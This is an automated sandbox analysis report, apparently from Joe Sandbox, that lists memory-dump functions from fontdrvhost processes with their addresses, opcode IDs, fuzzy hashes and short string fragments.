                                                                                            • Opcode Fuzzy Hash: ab3c4043a5350e0636dc6479564d84f2b6ffb071bfbb2db9415e78b54138a123
                                                                                            • Instruction Fuzzy Hash: 28217CB1908A5D8FDB81EF68D845AEDBFF1FF59311F00016AE408E72A2CA2498518790
                                                                                            Function 00007FFB4B2A3F00 Relevance: .1, Instructions: 85COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000025.00000002.2164413261.00007FFB4B2A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_37_2_7ffb4b2a0000_fontdrvhost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 6d1563f4e189de257449d5a91e86e835568cb1a58dd03760ffc05d03b16719d3
                                                                                            • Instruction ID: 432b2cf65856f07ee614a3a6a66f1d6796b3a3c403ab108cc8ef2047a92d172e
                                                                                            • Opcode Fuzzy Hash: 6d1563f4e189de257449d5a91e86e835568cb1a58dd03760ffc05d03b16719d3
                                                                                            • Instruction Fuzzy Hash: E3313C70D1961A8BE7A9EF34C5593B9B7A1EF58300F1045B9D95DE32E2CE38A981CB40
                                                                                            Function 00007FFB4B2A3F0B Relevance: .1, Instructions: 77COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000025.00000002.2164413261.00007FFB4B2A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_37_2_7ffb4b2a0000_fontdrvhost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 56248432fb69ac0a677232e4dae62dab6d2cca0cb5f92820c0fc40843c77e8a0
                                                                                            • Instruction ID: e5071992ebbd2b7bf7938c3c68a92fc153c802d39167efd51e264a03ea8cc777
                                                                                            • Opcode Fuzzy Hash: 56248432fb69ac0a677232e4dae62dab6d2cca0cb5f92820c0fc40843c77e8a0
                                                                                            • Instruction Fuzzy Hash: 112195B1D1D60A8BE768FF74C5456B9BBB1EF88310F104079D51D935E2DE38A941CB40
                                                                                            Function 00007FFB4B2A1048 Relevance: .1, Instructions: 74COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000025.00000002.2164413261.00007FFB4B2A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_37_2_7ffb4b2a0000_fontdrvhost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 523eacced990334f353bbaf829b7e0b5ee1de86401848d54d1ef95ec8d53d481
                                                                                            • Instruction ID: a90961b2d0e2d26900273c7c05e8c916fe639d1a0274d860fb21a809bbc7d84f
                                                                                            • Opcode Fuzzy Hash: 523eacced990334f353bbaf829b7e0b5ee1de86401848d54d1ef95ec8d53d481
                                                                                            • Instruction Fuzzy Hash: 45219F74A1891D8FDF84EF98D495EEEBBB1FF6C301F10416AE50AE3255CA34E8418B90
                                                                                            Function 00007FFB4B2A3F43 Relevance: .1, Instructions: 71COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000025.00000002.2164413261.00007FFB4B2A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_37_2_7ffb4b2a0000_fontdrvhost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 6ef1a7b38da4eca1f9a4612c545b2a319db310a3dfadde5a8d8c3bf78c204537
                                                                                            • Instruction ID: 076480a7b0ea5822112c9a8fb66e2d8260d65a5178a86c537296de41b80a8a20
                                                                                            • Opcode Fuzzy Hash: 6ef1a7b38da4eca1f9a4612c545b2a319db310a3dfadde5a8d8c3bf78c204537
                                                                                            • Instruction Fuzzy Hash: 38214C7090E7498FE769EF68C8197B9BBB1EF49310F0401BAD509D32D2DE38A845CB51
                                                                                            Function 00007FFB4B2A3FC1 Relevance: .1, Instructions: 64COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000025.00000002.2164413261.00007FFB4B2A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_37_2_7ffb4b2a0000_fontdrvhost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: fee431c335face6f7a6937469221c3395702ab4457be69afcd241e7c5da89ef0
                                                                                            • Instruction ID: 9e635a9282343df4108c5cc148ec0bc522cf127d5a1cd3b3710e20dd89dcefdb
                                                                                            • Opcode Fuzzy Hash: fee431c335face6f7a6937469221c3395702ab4457be69afcd241e7c5da89ef0
                                                                                            • Instruction Fuzzy Hash: 66117F7090D7894FE76AAF74C4157B97FB1AF46310F0440BAD449D71D3CD689845C751
                                                                                            Function 00007FFB4B2A3F62 Relevance: .1, Instructions: 63COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000025.00000002.2164413261.00007FFB4B2A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_37_2_7ffb4b2a0000_fontdrvhost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 68ec592a14293e49d658064820d317198f1daed43a3aed5d081ad96bbd65d7d5
                                                                                            • Instruction ID: 920d0dc990f740f35aed7ca2cafa6bcf9a5334bc62c32d04559868c48f5a3bd7
                                                                                            • Opcode Fuzzy Hash: 68ec592a14293e49d658064820d317198f1daed43a3aed5d081ad96bbd65d7d5
                                                                                            • Instruction Fuzzy Hash: BF11A770D1D64E8BE768FE38C5057BABAF1EF99310F104579D51EE32E1DE38A8058A41
                                                                                            Function 00007FFB4B2A3F86 Relevance: .1, Instructions: 59COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000025.00000002.2164413261.00007FFB4B2A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_37_2_7ffb4b2a0000_fontdrvhost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 57696c6e970e79fa9c668b586c277fbf1eb16ffade9e523dfa72205350711e0d
                                                                                            • Instruction ID: b3cb579de386dbb07c29ec947e376e2e6846742c01ff3b30853f2d123777988b
                                                                                            • Opcode Fuzzy Hash: 57696c6e970e79fa9c668b586c277fbf1eb16ffade9e523dfa72205350711e0d
                                                                                            • Instruction Fuzzy Hash: C81182B0D1D64A8BE7A9FF38C5053B97AA1EF88300F144079D51DE36E2DE38A841C704
                                                                                            Function 00007FFB4B2A3EEC Relevance: .1, Instructions: 56COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000025.00000002.2164413261.00007FFB4B2A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_37_2_7ffb4b2a0000_fontdrvhost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: bad080a95fa0f6bba1e13db12a906c3fd695bad6b97ea7c9f2ff5ccbbe788a3f
                                                                                            • Instruction ID: 28577010ba02cc524a275a7d00b2fa2b9ae95f9ba974aa39cdefc3f56dfc9908
                                                                                            • Opcode Fuzzy Hash: bad080a95fa0f6bba1e13db12a906c3fd695bad6b97ea7c9f2ff5ccbbe788a3f
                                                                                            • Instruction Fuzzy Hash: 0A1191B0D1DB4A8FE769AF38C5193B9BBB1AF49310F0450BAD519D32E2DE2898419705
                                                                                            Function 00007FFB4B2A3F74 Relevance: .1, Instructions: 56COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000025.00000002.2164413261.00007FFB4B2A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_37_2_7ffb4b2a0000_fontdrvhost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 02c97dedaca905503bd0a2b68ef11f93b4c443c08b74a3a02eff188d7b803299
                                                                                            • Instruction ID: 17c23a7e301075283bd7a1522903e60ac8fe4f6084958b450f27f8484a166b01
                                                                                            • Opcode Fuzzy Hash: 02c97dedaca905503bd0a2b68ef11f93b4c443c08b74a3a02eff188d7b803299
                                                                                            • Instruction Fuzzy Hash: B711A5B0D1DA4A8BE769BE38C5153B9BAE1EF48310F14443AD50EE36D1CE38A8418644
                                                                                            Function 00007FFB4B2A3F6B Relevance: .1, Instructions: 53COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000025.00000002.2164413261.00007FFB4B2A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_37_2_7ffb4b2a0000_fontdrvhost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 864618a2dd329ec8406ef57769855565d74d0e1fc8bacdb47272d91f94db4f1e
                                                                                            • Instruction ID: 757f30e5b22f396cff786ff3d8ad716f75614ff32598c6b73b9c7c6dd7f4c913
                                                                                            • Opcode Fuzzy Hash: 864618a2dd329ec8406ef57769855565d74d0e1fc8bacdb47272d91f94db4f1e
                                                                                            • Instruction Fuzzy Hash: 8301C4B090E74A8FE769EF34C5153B9BBA1EF49300F044479D40AE36D2DE38A841DB05
                                                                                            Function 00007FFB4B2A6680 Relevance: .0, Instructions: 50COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000025.00000002.2164413261.00007FFB4B2A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_37_2_7ffb4b2a0000_fontdrvhost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: bff99195625516614f3a79731241bf207a5f1d7725148a31f4b47846c8b00416
                                                                                            • Instruction ID: ccc8eed372c7ae74f52ece42e248e1a25c5a3109653ebd15bb3ac23e9b9965aa
                                                                                            • Opcode Fuzzy Hash: bff99195625516614f3a79731241bf207a5f1d7725148a31f4b47846c8b00416
                                                                                            • Instruction Fuzzy Hash: E101DC31848A0C8BCB55AF2A9C002887BB4FB9E318F00126AD44CD7180D3369A9AC741
                                                                                            Function 00007FFB4B2A10EA Relevance: .0, Instructions: 31COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000025.00000002.2164413261.00007FFB4B2A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_37_2_7ffb4b2a0000_fontdrvhost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: b29c24ffe5005c856c3af2135e5ef0bc6033e99fdf3e60683c6e4ed2bf4daf5e
                                                                                            • Instruction ID: 1456b1ddb5b6e9484af422dfa55523db19b662147d1aa6cd24da2ec648f7b865
                                                                                            • Opcode Fuzzy Hash: b29c24ffe5005c856c3af2135e5ef0bc6033e99fdf3e60683c6e4ed2bf4daf5e
                                                                                            • Instruction Fuzzy Hash: 71E0683680CA4C4BDB90FE68E8066A5FFE0FBCE318F00006DE64CD3091C324955AC380
                                                                                            Function 00007FFB4B2A09D3 Relevance: .0, Instructions: 25COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000025.00000002.2164413261.00007FFB4B2A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_37_2_7ffb4b2a0000_fontdrvhost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: aac3cf6f67c5797550a90fa974a073940c09e7a6050fb2263c70e07a67b296d9
                                                                                            • Instruction ID: 656c58ebe3b2a71ce725ce1e871f8cda0baf1e626ddabc39980ea0ad84f4c010
                                                                                            • Opcode Fuzzy Hash: aac3cf6f67c5797550a90fa974a073940c09e7a6050fb2263c70e07a67b296d9
                                                                                            • Instruction Fuzzy Hash: 13E04F71928A1E4FDB88FF68D8855FDB7E2FF88300B004439D14DE3151CA206C04C780

                                                                                            Non-executed Functions

                                                                                            Function 00007FFB4B2A57F2 Relevance: 6.5, Strings: 5, Instructions: 243COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000025.00000002.2164413261.00007FFB4B2A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2A0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_37_2_7ffb4b2a0000_fontdrvhost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: 0O4K$@O4K$PO4K$`O4K$pP4K
                                                                                            • API String ID: 0-183661772
                                                                                            • Opcode ID: fd36709a27cd372fce4e76f8fee9d7562e53257a54aaf0bc81f460c3ac511de2
                                                                                            • Instruction ID: 2c633c7f8829b94442ea81b4e7f7ddd9c7a346a892011dc28556f5ab1e2e5617
                                                                                            • Opcode Fuzzy Hash: fd36709a27cd372fce4e76f8fee9d7562e53257a54aaf0bc81f460c3ac511de2
                                                                                            • Instruction Fuzzy Hash: 4651F987B0F6DA0FE31679BCBC510E9BF90EF862B534943F7D1888A0A7AC15494A42D1

                                                                                            Executed Functions

                                                                                            Function 00007FFB4B2C1EC3 Relevance: 16.5, Strings: 12, Instructions: 1497COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000029.00000002.2163862141.00007FFB4B2C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2C0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_41_2_7ffb4b2c0000_fontdrvhost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: "$H$[$[$\$]$]$u${${$}$}
                                                                                            • API String ID: 0-2063274034
                                                                                            • Opcode ID: d66be30f231bfc661c3720dfd1bf183480c241c5fbd0af9c4842e57ff97c60ea
                                                                                            • Instruction ID: 22087f27ef44cf1204183f38ac6b9879e7de16eb4f57a28464b955b8a401a4df
                                                                                            • Opcode Fuzzy Hash: d66be30f231bfc661c3720dfd1bf183480c241c5fbd0af9c4842e57ff97c60ea
                                                                                            • Instruction Fuzzy Hash: 91D2B5B0D196298FDBA9EF28C8957E9B7B1FF58301F1041E9D40DE7291CA35AA81CF44
                                                                                            Function 00007FFB4B2C1250 Relevance: 1.5, Strings: 1, Instructions: 276COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000029.00000002.2163862141.00007FFB4B2C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2C0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_41_2_7ffb4b2c0000_fontdrvhost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID: 0-3916222277
                                                                                            • Opcode ID: 28279720ac11accd523e71d63d1dd0db4aeb64ca8ec5e4528817a93f5346666a
                                                                                            • Instruction ID: 145128db7585d565c0a97f5b917c3049d8f9a3409ccdc064d77498163ac29a2a
                                                                                            • Opcode Fuzzy Hash: 28279720ac11accd523e71d63d1dd0db4aeb64ca8ec5e4528817a93f5346666a
                                                                                            • Instruction Fuzzy Hash: 43A1A574A18A1C8FDB94EF58C895BA8BBF1FF69301F4541A9D00DE7265CB74AC81CB41
                                                                                            Function 00007FFB4B2C3A8D Relevance: 1.3, Strings: 1, Instructions: 85COMMON
                                                                                            Download Yara Rule
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000029.00000002.2163862141.00007FFB4B2C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2C0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_41_2_7ffb4b2c0000_fontdrvhost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID: H#6K
                                                                                            • API String ID: 0-771579418
                                                                                            • Opcode ID: cc2bb1870b1a4f7e2035aa45d99ce901111aaa223271d9c552a710ffc6fbdd80
                                                                                            • Instruction ID: 052f94421d7bca2183edbebabc3bd338e32968fd3d3d0e40c7776ffa04c16104
                                                                                            • Opcode Fuzzy Hash: cc2bb1870b1a4f7e2035aa45d99ce901111aaa223271d9c552a710ffc6fbdd80
                                                                                            • Instruction Fuzzy Hash: 3B21AEB1A0DA8A4FE7A5FE38C8646EABBB1FF45301F0444B9C14C931A2DE79A841C741
                                                                                            Function 00007FFB4B2C1751 Relevance: .4, Instructions: 401COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000029.00000002.2163862141.00007FFB4B2C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2C0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_41_2_7ffb4b2c0000_fontdrvhost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 730232cb19ebfcd3da4f52a2369d474bf1c0f7f8d521ee0c8e8c2802bae3190f
                                                                                            • Instruction ID: b2ceadc735fb4bf10799cf7d9839eec85268a033fdc5e75dec4e2d8c08fdfb4f
                                                                                            • Opcode Fuzzy Hash: 730232cb19ebfcd3da4f52a2369d474bf1c0f7f8d521ee0c8e8c2802bae3190f
                                                                                            • Instruction Fuzzy Hash: E6E18FB1D1D6498FDB99EF68C8957E8BBF1EF48301F1440BAD14DE3292CA386881CB51
                                                                                            Function 00007FFB4B2C1831 Relevance: .2, Instructions: 246COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000029.00000002.2163862141.00007FFB4B2C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2C0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_41_2_7ffb4b2c0000_fontdrvhost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: a1f4d26f9abb695804f1c35a70ab6ee34eb0172df31006d6b1d6bf9e63a4dbd3
                                                                                            • Instruction ID: ae91b2ebe6ce58f306dafa6f90ccf9dc99a7557833e571dd313f3e11df4a32c1
                                                                                            • Opcode Fuzzy Hash: a1f4d26f9abb695804f1c35a70ab6ee34eb0172df31006d6b1d6bf9e63a4dbd3
                                                                                            • Instruction Fuzzy Hash: 02913BB191865A8FDB99EF68C4A57A8BBF1FF58301F1441B9D00DE7292CE386881CB41
                                                                                            Function 00007FFB4B2C0DD9 Relevance: .2, Instructions: 213COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000029.00000002.2163862141.00007FFB4B2C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2C0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_41_2_7ffb4b2c0000_fontdrvhost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 1959704c634aab3e8ce1bed13c005107a8fa0cf23f267464677439b905f4d983
                                                                                            • Instruction ID: 8d02f1bef3abf0ae6089acb598aaa56f57e00e13f840795b7fd48bb0f8393d7c
                                                                                            • Opcode Fuzzy Hash: 1959704c634aab3e8ce1bed13c005107a8fa0cf23f267464677439b905f4d983
                                                                                            • Instruction Fuzzy Hash: 78611F7091894E8FDB85FF68C895AEAB7B1FF58310F1445B5D40DD7296CE34A882CB90
                                                                                            Function 00007FFB4B2C4843 Relevance: .2, Instructions: 207COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000029.00000002.2163862141.00007FFB4B2C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2C0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_41_2_7ffb4b2c0000_fontdrvhost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: e894a3236dc7af329c1f8cd5fac1d666165c37a13edfa3bef1d8d64cd7e9dce4
                                                                                            • Instruction ID: 1300056977328687f1dea3d5e78a9d89aca58497a099af8fba0ef84267558059
                                                                                            • Opcode Fuzzy Hash: e894a3236dc7af329c1f8cd5fac1d666165c37a13edfa3bef1d8d64cd7e9dce4
                                                                                            • Instruction Fuzzy Hash: 9B81B4B0D19A1D8FEB95EFA8C895BEDBBB1FF58301F5041A9D40DE3252DE3469818B40
                                                                                            Function 00007FFB4B2C4380 Relevance: .2, Instructions: 207COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000029.00000002.2163862141.00007FFB4B2C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2C0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_41_2_7ffb4b2c0000_fontdrvhost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 290578346627cd59265624ac81067541c0666c63faebcd210b76a83f468c9400
                                                                                            • Instruction ID: 9aecfe753af2c85bcd9e95b0bf3c1ccc68092746c5663a5c1993b894fdaa095c
                                                                                            • Opcode Fuzzy Hash: 290578346627cd59265624ac81067541c0666c63faebcd210b76a83f468c9400
                                                                                            • Instruction Fuzzy Hash: 387119D2C1DAC60BF325BF7CD8650BB7FB1AF51314B2880BAE59C871EBD91868058281
                                                                                            Function 00007FFB4B2C08B1 Relevance: .2, Instructions: 204COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000029.00000002.2163862141.00007FFB4B2C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2C0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_41_2_7ffb4b2c0000_fontdrvhost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 7484ebc62b0c0675a00c6cf84bf4c806d5fd11d2611f72d8221cc138ee7128db
                                                                                            • Instruction ID: 1f1076daf737095daa3b31221b52cac94d4c284a953ee91e2a15f7425fbf04b5
                                                                                            • Opcode Fuzzy Hash: 7484ebc62b0c0675a00c6cf84bf4c806d5fd11d2611f72d8221cc138ee7128db
                                                                                            • Instruction Fuzzy Hash: 53616CB190CA4E8FEB94FF78C8546AABBB1FF59301F4441BAD509D71A1DA35A842CB40
                                                                                            Function 00007FFB4B2C4611 Relevance: .2, Instructions: 173COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000029.00000002.2163862141.00007FFB4B2C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2C0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_41_2_7ffb4b2c0000_fontdrvhost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 58f38a0f2aa233e10818989e8e9afb13028e8f02bfdb386ee4b0fdc5c4c999ab
                                                                                            • Instruction ID: 66171c884486dea959011dd87355130af7119c56ea64cb56f406f94aaa555893
                                                                                            • Opcode Fuzzy Hash: 58f38a0f2aa233e10818989e8e9afb13028e8f02bfdb386ee4b0fdc5c4c999ab
                                                                                            • Instruction Fuzzy Hash: 1851B4B0D18A1D8FDB94EFA8C855BEEBBB1FF58301F1001AAD40DE7295CA746881CB50
                                                                                            Function 00007FFB4B2C0AB9 Relevance: .2, Instructions: 159COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000029.00000002.2163862141.00007FFB4B2C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2C0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_41_2_7ffb4b2c0000_fontdrvhost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 816ec6081d71e1ed7eb0499b0b2de07501eb585209e019eeae94165185ef4fb9
                                                                                            • Instruction ID: e40e4d53599376944c767d58fbb1129569c0ab43d42a50c03773c209f3aec230
                                                                                            • Opcode Fuzzy Hash: 816ec6081d71e1ed7eb0499b0b2de07501eb585209e019eeae94165185ef4fb9
                                                                                            • Instruction Fuzzy Hash: 5451ECB0D18A5D8FDF98EFA8C8546EEBBB2FF58301F14416AD409E7295CB745845CB40
                                                                                            Function 00007FFB4B2C6129 Relevance: .1, Instructions: 147COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000029.00000002.2163862141.00007FFB4B2C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2C0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_41_2_7ffb4b2c0000_fontdrvhost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 9bbc548ba10c74c031418ddad89bc6ac91048f48501702dbd572d5194fbf0dcc
                                                                                            • Instruction ID: 1b6b3a8f322ae6c681f01c2a9cceb0d95b920b6dd33f041c7a01b582e11207a1
                                                                                            • Opcode Fuzzy Hash: 9bbc548ba10c74c031418ddad89bc6ac91048f48501702dbd572d5194fbf0dcc
                                                                                            • Instruction Fuzzy Hash: 63517CB190CA598FEB96FF68C5887ACBBB1FF59301F50807AC109D32A5CB385985CB40
                                                                                            Function 00007FFB4B2C38B8 Relevance: .1, Instructions: 138COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000029.00000002.2163862141.00007FFB4B2C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2C0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_41_2_7ffb4b2c0000_fontdrvhost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: deb28fe5cf458b95c490cb1b51036f124de44193425c586edfa766ff0f3ee987
                                                                                            • Instruction ID: 50bd17620f450cb09d4d10c974dc44b5326952e213b7f217e019bc6c0bdee910
                                                                                            • Opcode Fuzzy Hash: deb28fe5cf458b95c490cb1b51036f124de44193425c586edfa766ff0f3ee987
                                                                                            • Instruction Fuzzy Hash: 13418BB1E1C91D8FDB45EFA8D855AFDBBB1FF58310F10017AE00AE3296DA35A9018B51
                                                                                            Function 00007FFB4B2C0C6D Relevance: .1, Instructions: 122COMMON
                                                                                            Download Yara Rule
                                                                                            Memory Dump Source
                                                                                            • Source File: 00000029.00000002.2163862141.00007FFB4B2C0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFB4B2C0000, based on PE: false
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_41_2_7ffb4b2c0000_fontdrvhost.jbxd
                                                                                            Similarity
                                                                                            • API ID:
                                                                                            • String ID:
                                                                                            • API String ID:
                                                                                            • Opcode ID: 6014501e199086896dd96007fa6fe3687bfd6b9870afba1891963cd0b6f15a0b
                                                                                            • Instruction ID: 7f98a0e0f5cf45638189c7a8658bb831886c9211e99c83c15752d4e853a6190b
                                                                                            • Opcode Fuzzy Hash: 6014501e199086896dd96007fa6fe3687bfd6b9870afba1891963cd0b6f15a0b
                                                                                            • Instruction Fuzzy Hash: 794127B1C0961D8FDB51EFB8D4886EEBBB0FF19300F10057AD409E31A2DA78A945CB80
                                                                                            Function 00007FFB4B2C1521 Relevance: .1, Instructions: 119COMMON
